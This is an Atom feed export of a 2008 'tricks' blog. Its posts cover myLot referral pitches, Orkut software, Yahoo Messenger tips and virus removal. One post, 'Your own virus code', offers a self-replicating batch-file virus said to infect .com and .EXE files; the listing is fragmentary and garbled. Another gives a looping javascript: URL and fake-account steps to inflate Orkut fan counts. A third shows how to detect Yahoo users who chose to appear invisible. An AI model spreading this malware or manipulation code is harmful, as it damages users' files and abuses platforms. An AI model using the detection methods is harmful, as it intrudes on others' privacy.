/&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;read and discuss the news&lt;/span&gt;&lt;br /&gt;Never miss what's going on in the world.&lt;br /&gt;&lt;br /&gt;We have breaking news stories, as well as articles tailored towards your specific interests.&lt;br /&gt;&lt;br /&gt;You can even debate current events with other myLot users.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;search and find&lt;/span&gt;&lt;br /&gt;myLot has a comprehensive searching experience unlike any other.&lt;br /&gt;&lt;br /&gt;Whether you're looking for web sites, discussions, news, blog articles, photos or private messages, you can easily find them!&lt;br /&gt;&lt;br /&gt;With Yahoo! Search powering our web results, there's absolutely no reason to search anywhere else.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;&lt;/span&gt;&lt;/a&gt;&lt;a&gt;Join by clicking here&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;Give it a try. We guarantee you'll like what you find!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;read and discuss articles from leading blogs&lt;br /&gt;The blogging community produces some of the best information on the internet, and now we've brought this information onto myLot.&lt;br /&gt;&lt;br /&gt;Blog articles are tailored towards your interests, or you can subscribe to specific blogs that interest you.&lt;br /&gt;Do you own a blog? Then submit your blog for inclusion on myLot. It's a great way to obtain more readers of your blog!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;recruit other members&lt;/span&gt;&lt;br /&gt;Along with the earnings program mentioned above, you're compensated for each and every new user that you refer to myLot who participates.&lt;br /&gt;&lt;br /&gt;Instead of blowing our advertising budget on television, radio, or online ads, we've decided to pay our loyal users instead. After all, the myLot users are our best ambassadors!&lt;br /&gt;&lt;br /&gt;If you're reading this, then chances are that you yourself were referred by a myLot member. This is a great program, and many members are making a LOT of money each month helping myLot grow!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;Join by clicking here &lt;/span&gt;&lt;/a&gt;&lt;br /&gt;--------------&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;Payment proof&lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.mylot.com/?ref=arshdeep79"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_Osu6Fdz0VN0/SDeZxNikKMI/AAAAAAAAABM/QNNbp3FOxMg/s400/MylotPayment.gif" alt="" id="BLOGGER_PHOTO_ID_5203796965177174210" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8339540408686935074?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8339540408686935074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8339540408686935074' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8339540408686935074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8339540408686935074'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/make-money-earn-join-mylot-payment.html' title='Make money : Earn $$ join myLot : Payment proofs'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Osu6Fdz0VN0/SDeafdikKNI/AAAAAAAAABU/J0FhiZuUL9E/s72-c/Mylot' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1099850801112962389</id><published>2008-05-17T03:57:00.000-07:00</published><updated>2008-05-17T04:13:36.729-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Orkut'/><title type='text'>Orkut trick : Software Orkut cute 9.4.27</title><content type='html'>Orkut Cute came to be with the intent to ease the access to your Orkut account. With it you can easily access your account and quickly check your scraps. The program automatically logs in to Orkut creating an icon on the Windows system tray. All it takes to access your account is a double-click on that icon.&lt;br /&gt;&lt;br /&gt;It also allows for you to send scraps to all your friends at once.&lt;br /&gt;&lt;br /&gt;You can set up the program to warn you whenever someone sends you a scrap.&lt;br /&gt;&lt;br /&gt;Characteristics:&lt;br /&gt;- You can create several standard messages: they are stored in a database, so that you don’t need to type them all over again.&lt;br /&gt;- You can choose to which friends you want to send your message&lt;br /&gt;- Macroreplacement unique system. By placing the identifiers $nc$ or $nl$ anywhere on your message, they will be replaced by your friend’s name once the message is posted.&lt;br /&gt;- By activating the “random messages” option the program will search messages randomly on its database everytime it posts.&lt;br /&gt;&lt;br /&gt;This way you will be able to create several messages and each of your friends will receive a different message.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0); font-weight: bold;"&gt;Download&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://www.softpedia.com/progDownload/Orkut-Cute-Download-44976.html&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0); font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1099850801112962389?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1099850801112962389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1099850801112962389' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1099850801112962389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1099850801112962389'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/orkut-trick-software-orkut-cute-9427.html' title='Orkut trick : Software Orkut cute 9.4.27'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7751660047325726060</id><published>2008-05-17T03:54:00.000-07:00</published><updated>2008-05-17T04:13:36.730-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Orkut'/><title type='text'>Orkut trick : Orkut scrap sender  software</title><content type='html'>This is a freeware program that let you browse orkut and know when you or your friends receive new scraps. You can add emoticons, colour and formatting to your scraps with ease. Sending scraps from your desktop is also as easy as writing an instant message.&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 153, 0);"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Download&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://rapidshare.com/files/111746832/setup.exe.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7751660047325726060?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7751660047325726060/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7751660047325726060' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7751660047325726060'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7751660047325726060'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/orkut-trick-orkut-scrap-sender-software.html' title='Orkut trick : Orkut scrap sender  software'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-5860776388771992913</id><published>2008-05-17T03:51:00.000-07:00</published><updated>2008-05-17T04:13:36.731-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Orkut'/><title type='text'>Orkut Trick to ncrease orkut fans</title><content type='html'>Follow the steps:&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:180%;" &gt;&lt;span style="font-weight: bold;"&gt;1)&lt;/span&gt; &lt;/span&gt;Create a fake account or simply login with ur friends Id.. and add yourself as a friend there.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);font-size:180%;" &gt;2)&lt;/span&gt; Visit the FRIENDS page by logging into your just created fake account or the Friends account.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);font-size:180%;" &gt;3)&lt;/span&gt; Point your cursor on the fan icon () beside your real profile. Note your status bar. It should be showing something like javascript:setKarma('FRUS*******/US*******'). Note the code FRUS******* and US******* somewhere. Now, click on the star so as to make your fake account a fan of your real account.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);font-size:180%;" &gt;4)&lt;/span&gt; Copy the following code to your address bar (The location where you type http://www.orkut.com ). Replace FRUS******* and US******* in the following script with the one you noted in the above step.&lt;br /&gt;&lt;br /&gt;javascript:function cmd(){window.location="/setkarma?cat=0&amp;amp;val=3&amp;amp;gid=FRUS*******/US*******";}void(setInterval(cmd,2000));&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);font-size:180%;" &gt;&lt;br /&gt;5)&lt;/span&gt; Hit ENTER key of your keyboard. The page will keep on reloading and your fans will keep on increasing with an approximate speed of 6 fans per second untl you close the window.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-5860776388771992913?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/5860776388771992913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=5860776388771992913' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5860776388771992913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/5860776388771992913'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/orkut-trick-to-ncrease-orkut-fans.html' title='Orkut Trick to ncrease orkut fans'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2157996584697948139</id><published>2008-05-17T03:46:00.000-07:00</published><updated>2008-05-17T04:13:36.732-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Orkut'/><title type='text'>Orkut trick : Make your name invisible in your orkut profile</title><content type='html'>For making your name invisible follow the steps:&lt;br /&gt;&lt;br /&gt;1) Click on edit profile&lt;br /&gt;&lt;br /&gt;2) Type ALT + 0173 in your first name and last name. (i.e. Type 0173 while pressing the ALT key of your keyboard.)&lt;br /&gt;&lt;br /&gt;3) Click on Update&lt;br /&gt;8.1) Make your Picture invisible in your profile !&lt;br /&gt;&lt;br /&gt;In MS Paint, create the smallest image possible and den upload it I.E. 1X1 pic!!&lt;br /&gt;virtually unclickable ! n u are invisible now !&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2157996584697948139?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2157996584697948139/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2157996584697948139' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2157996584697948139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2157996584697948139'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/orkut-trick-make-your-name-invisible-in.html' title='Orkut trick : Make your name invisible in your orkut profile'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3210516818164554270</id><published>2008-05-17T03:43:00.000-07:00</published><updated>2008-05-17T04:13:36.732-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Orkut'/><title type='text'>Orkut trick Get rid of orkut virus</title><content type='html'>"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!".&lt;br /&gt;&lt;br /&gt;Did you eer found an error wile opening Orkut?It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).&lt;br /&gt;&lt;br /&gt;If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\&gt; type attrib -S -H heap41a to make this folder visible and then just delete this folder.&lt;br /&gt;&lt;br /&gt;Now use a registry cleaner to delete the registry keys made by this&lt;br /&gt;&lt;br /&gt;Easy Method to delete the virus.&lt;br /&gt;&lt;br /&gt;open task manager&gt;process tab&gt;there if you find svchost.exe befor your user name (remember also system will use svchost.exe don't end that) just give end process for that then go to run and type C://heap41a and delete all files of that folder..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3210516818164554270?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3210516818164554270/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3210516818164554270' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3210516818164554270'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3210516818164554270'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/orkut-trick-get-rid-of-orkut-virus.html' title='Orkut trick Get rid of orkut virus'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6197681864328700821</id><published>2008-05-17T03:41:00.000-07:00</published><updated>2008-05-17T04:12:56.517-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus codes'/><title type='text'>Your own virus code</title><content type='html'>&lt;p&gt;A simple VIRUS code is here: Just save the following code as .bat extension in notepad.&lt;/p&gt;&lt;p&gt;The antivirus will detect it as virus. see for yourself.&lt;/p&gt;&lt;p style="color: rgb(51, 0, 51);"&gt;It will affect *.com and *.EXE files .&lt;/p&gt;&lt;p&gt;It will multiply itself and may get more dangerous when altered.&lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;@echo off&gt;nul.ViRuSif &lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;"%1=="/ViRuS_MULTIPLY goto ViRuS_multiplyif &lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;"%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif &lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;"%1=="/ViRuS_FINDSELF goto ViRuS_findselfif &lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;"%VOFF%=="T goto ViRuS_OLDBAT&lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;set ViRuSname=%0&lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;if not exist %0.bat call %0 /ViRuS_FINDSELF %path%&lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;if not exist %ViRuSname%.bat set ViRuSname=&lt;/p&gt;&lt;p style="color: rgb(204, 0, 0);"&gt;if "%ViRuSname%==" goto ViRuS_OLDBAT&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6197681864328700821?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6197681864328700821/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6197681864328700821' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6197681864328700821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6197681864328700821'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/your-own-virus-code.html' title='Your own virus code'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1675270178514198124</id><published>2008-05-17T03:38:00.000-07:00</published><updated>2008-05-17T04:12:05.490-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yahoo'/><title type='text'>Finding a invisible user on Yahoo! Messenger : yahoo trick</title><content type='html'>Many people nowdays prefer to stay offline while using Yahoo! Messenger -mostly done to avoid someone. There are many ways of finding people who are online but yet invisible.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:130%;" &gt;First Method: Doodle Method&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Double Click on the user whose status you want to check.&lt;br /&gt;&lt;br /&gt;2. A message window will open.&lt;br /&gt;&lt;br /&gt;3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.&lt;br /&gt;&lt;br /&gt;4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.&lt;br /&gt;a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously. If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page.&lt;br /&gt;&lt;br /&gt;So the user is online!There is a counter attack of this trick:Go to Messenger&gt;&gt;Preferences&gt;&gt;Messages and now uncheck Enable IMVironments. Now this trick is nullified!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:130%;" &gt;Second Method: Voice Chat&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Double Click on the user whose status you want to check.&lt;br /&gt;&lt;br /&gt;2. Click on “Voice” icon on the toolbar, or select “Contact” menu and select “Enable Voice Chat” .&lt;br /&gt;&lt;br /&gt;3. The deciding part… there are 2 possible results:&lt;br /&gt;&lt;br /&gt;a) If the user is offline, you will get this message: “Internal server error. Cannot obtain voice token to start voice chat.” If the user is invisible (actually online), you will see the Voice Toolbar.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:130%;" &gt;Third Method: Conference Invitation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Right Click on the user whose status you want to check.&lt;br /&gt;&lt;br /&gt;2. When the menu appears, select Invite to Conference.&lt;br /&gt;&lt;br /&gt;3. A window will appear. See at the right pane, the username you selected will be there. Now, click Invite.&lt;br /&gt;&lt;br /&gt;4. The deciding part… there are 2 possible results:&lt;br /&gt;&lt;br /&gt;a) If the user is offline, you will get this message: “None of the users in the invite list are available to join the conference.&lt;br /&gt;&lt;br /&gt;Please try at a later time.”If the user is invisible, you will get a window similar saying: “You are now logged into voice conference - "&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:130%;" &gt;Fourth Method: Buddy Spy&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Get Buddy Spy from&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;http://www.buddy-spy.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2. Go to configure and enter your login details.&lt;br /&gt;&lt;br /&gt;3. Now go to Buddy Spy option and enter the username you want to track. You can also check multiple ids also. Not only Buddy Spy tells the status of Chat but also Room Chat and WebCamera status of that user also!&lt;br /&gt;&lt;br /&gt;4. You can edit other options through Scan Options menu.Now Have a great chatting!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1675270178514198124?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1675270178514198124/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1675270178514198124' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1675270178514198124'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1675270178514198124'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/finding-invisible-user-on-yahoo.html' title='Finding a invisible user on Yahoo! Messenger : yahoo trick'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2218842887189464151</id><published>2008-05-17T03:24:00.000-07:00</published><updated>2008-05-17T04:12:05.491-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Yahoo'/><title type='text'>Yahoo trick :Disable yahoo from tracking you</title><content type='html'>As you all know, Yahoo! upgraded its features and the capacities of the mail accounts have grown to 2GB. That's good for sure, but the "monitoring" methods that we all have been far too familiar with in the last couple of years have been renewed with this move also.&lt;br /&gt;&lt;br /&gt;Yahoo! is now keeping track of which sites its members that are getting into groups or using Yahoo! services are visiting and storing this data with a method called "Web Beacons".&lt;br /&gt;&lt;br /&gt;The aim is to give these statistics to the partner companies arranged by agreement and to improve the "advertisement guiding" function. However, those who are bothered by this and do not want to be kept track of have still a choice.&lt;br /&gt;&lt;br /&gt;Yahoo! has hidden this option way deep inside somewhere but I'm declaring it here in case there are people who want it anyway:&lt;br /&gt;&lt;br /&gt;1. Go to the address code&lt;a href="http://privacy.yahoo.com/privacy"&gt;http://privacy.yahoo.com/privacy&lt;/a&gt;and click the "Cookies" link under the "Special Topics" column.&lt;br /&gt;&lt;br /&gt;2. Click the "Web Beacons" link under the "Reference Links" Column.&lt;br /&gt;&lt;br /&gt;3. On this page, click the "click here to opt out" link toward the end of the third paragraph under the "Outside the Yahoo! Network" title.&lt;br /&gt;&lt;br /&gt;4. After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual surfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!)&lt;br /&gt;&lt;br /&gt;5. You're done! Now Yahoo! will not record what you're doing during surfing.You can let your friends that might be interested know about this; since no matter how "innocent" it may seem, it's still a violation of privacy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2218842887189464151?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2218842887189464151/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2218842887189464151' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2218842887189464151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2218842887189464151'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2008/05/yahoo-trick-disable-yahoo-from-tracking.html' title='Yahoo trick :Disable yahoo from tracking you'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1659538214829821359</id><published>2008-05-17T03:19:00.000-07:00</published
